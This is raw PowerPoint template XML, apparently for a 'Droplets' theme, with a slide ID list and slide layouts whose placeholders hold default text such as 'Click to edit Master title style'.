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60" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="272" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="274" r:id="rId14"/>
    <p:sldId id="275" r:id="rId15"/>
    <p:sldId id="268" r:id="rId16"/>
    <p:sldId id="276" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="278" r:id="rId20"/>
    <p:sldId id="279" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="262" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="283" r:id="rId26"/>
    <p:sldId id="286" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="284" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="285" r:id="rId32"/>
    <p:sldId id="290" r:id="rId33"/>
    <p:sldId id="291" r:id="rId34"/>
    <p:sldId id="292" r:id="rId35"/>
    <p:sldId id="293" r:id="rId36"/>
    <p:sldId id="294" r:id="rId37"/>
    <p:sldId id="295" r:id="rId38"/>
    <p:sldId id="296" r:id="rId39"/>
    <p:sldId id="297" r:id="rId40"/>
    <p:sldId id="298" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="263" r:id="rId44"/>
    <p:sldId id="301" r:id="rId45"/>
    <p:sldId id="302" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="307" r:id="rId50"/>
    <p:sldId id="308" r:id="rId51"/>
    <p:sldId id="309" r:id="rId52"/>
    <p:sldId id="310" r:id="rId53"/>
    <p:sldId id="311" r:id="rId54"/>
    <p:sldId id="312" r:id="rId55"/>
    <p:sldId id="313" r:id="rId5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3350"/>
    <p:restoredTop sz="86583"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="48" d="100"/>
          <a:sy n="48" d="100"/>
        </p:scale>
        <p:origin x="-134" y="-72"/>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Droplets-HD-Title-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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="1300785"/>
            <a:ext cx="8689976" cy="2509213"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751012" y="3886200"/>
            <a:ext cx="8689976" cy="1371599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="22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zh-CN" smtClean="0"/>
              <a:t>Click to edit Master subtitle style</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94" y="4289374"/>
            <a:ext cx="10364432" cy="811610"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1184744" y="698261"/>
            <a:ext cx="9822532" cy="3214136"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4944"/>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zh-CN" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="5108728"/>
            <a:ext cx="10364452" cy="682472"/>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599"/>
            <a:ext cx="10364452" cy="3427245"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="4204821"/>
            <a:ext cx="10364452" cy="1586380"/>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1446212" y="609600"/>
            <a:ext cx="9302752" cy="2992904"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720644" y="3610032"/>
            <a:ext cx="8752299" cy="59478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Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="4372796"/>
            <a:ext cx="10364452" cy="1421053"/>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1001488" y="75416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4" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10557558" y="299357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2138721"/>
            <a:ext cx="10364452" cy="2511835"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="4662335"/>
            <a:ext cx="10364452"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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"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15" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="609600"/>
            <a:ext cx="10364452" cy="1605094"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367093"/>
            <a:ext cx="3298976"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8" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2943355"/>
            <a:ext cx="3298976"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9" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4452389" y="2367093"/>
            <a:ext cx="3291521"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10" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441348" y="2943355"/>
            <a:ext cx="3303351"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11" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973298" y="2367093"/>
            <a:ext cx="3304928"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12" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973298" y="2943355"/>
            <a:ext cx="3304928"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3" name="Date Placeholder 2"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15"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30" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="610772"/>
            <a:ext cx="10364452" cy="1603922"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="4204820"/>
            <a:ext cx="3296409"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20" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367093"/>
            <a:ext cx="3296409" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9363"/>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ltLang="zh-CN" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="4781082"/>
            <a:ext cx="3296409" cy="101011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22" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4442759" y="4204820"/>
            <a:ext cx="3301828"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23" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441348" y="2367093"/>
            <a:ext cx="3303352" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8841"/>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ltLang="zh-CN" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="19"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4441348" y="4781080"/>
            <a:ext cx="3303352" cy="1010119"/>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25" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973298" y="4204820"/>
            <a:ext cx="3300681"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26" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="22"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973298" y="2367093"/>
            <a:ext cx="3304928" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8841"/>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ltLang="zh-CN" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="20"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7973173" y="4781078"/>
            <a:ext cx="3305053" cy="1010121"/>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3" name="Date Placeholder 2"/>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altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2367093"/>
            <a:ext cx="10364452" cy="3424107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>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Vertical Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" orient="vert"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8724900" y="609601"/>
            <a:ext cx="2553326" cy="5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Vertical Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" orient="vert" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="609601"/>
            <a:ext cx="7658724" cy="5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>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3" name="Picture 2"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altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="3424107"/>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828563"/>
            <a:ext cx="10351752" cy="2736819"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="3657457"/>
            <a:ext cx="10351752" cy="1368183"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod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ltLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>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en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="5106026" cy="3424107"/>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13" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="2367092"/>
            <a:ext cx="5105400" cy="3424107"/>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5" name="Picture 14"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en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1146328" y="2371018"/>
            <a:ext cx="487347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12" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="3051012"/>
            <a:ext cx="5106027" cy="2740187"/>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5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6396423" y="2371018"/>
            <a:ext cx="488180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13" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="3051012"/>
            <a:ext cx="5105401" cy="2740187"/>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altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style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7" name="Picture 6"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Date Placeholder 1"/>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609600"/>
            <a:ext cx="3935688" cy="2023252"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078062" y="609600"/>
            <a:ext cx="6200163" cy="5181599"/>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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2632852"/>
            <a:ext cx="3935689" cy="3158348"/>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600"/>
            <a:ext cx="5934969" cy="2023254"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="3200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7424803" y="609601"/>
            <a:ext cx="3255358" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4943"/>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zh-CN" smtClean="0"/>
              <a:t>Drag picture to placeholder or click icon to add</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913794" y="2632852"/>
            <a:ext cx="5934949" cy="3158347"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="\\DROBO-FS\QuickDrops\JB\PPTX NG\Droplets\LightingOverlay.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId19">
            <a:alphaModFix/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns=""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itle Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="618517"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913775" y="2367093"/>
            <a:ext cx="10364452" cy="3424107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>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4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
